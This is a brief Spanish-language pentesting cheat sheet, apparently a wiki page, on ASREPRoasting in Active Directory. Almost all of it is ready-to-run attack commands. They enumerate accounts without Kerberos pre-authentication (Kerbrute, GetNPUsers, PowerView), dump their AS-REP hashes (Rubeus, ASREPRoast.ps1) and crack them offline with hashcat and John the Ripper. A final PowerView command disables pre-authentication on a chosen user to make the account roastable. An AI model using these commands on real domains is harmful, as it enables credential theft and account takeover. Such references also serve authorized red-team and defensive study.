ASREPRoast
Descripción
Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH
).
Linux/Unix
Enumeración de usuarios con DONT_REQ_PREAUTH
habilitado.
Kerbrute
kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
<wordlists> = ruta de wordlist de nombres de usuarios de dominio.
Impacket
GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt
Hashcat
Cracking de AS-REP.
hashcat -m 18200 as-rep.txt <path-wordlist>
John the Ripper
Cracking de AS-REP.
john as-rep.txt --format:krb5asrep --wordlist=<path-wordlist>
Windows
Enumeración de usuarios con DONT_REQ_PREAUTH
habilitado.
# PowerView
Get-DomainUser -PreauthNotRequired | select SamAccountName, UserPrincipalName, UserAccountControl | fl
# Módulo ActiveDirectory PowerShell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Obtención de AS-REP de usuario.
# Rubeus
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat
# ASREPRoast.ps1
Get-ASREPHash -UserName <user> -Verbose
Obtención de AS-REP de todos los usuarios.
# ASREPRoast.ps1
Invoke-ASREPRoast -Verbose
Habilitar configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH
) para un usuario.
# PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} –Verbose
Última actualización
¿Te fue útil?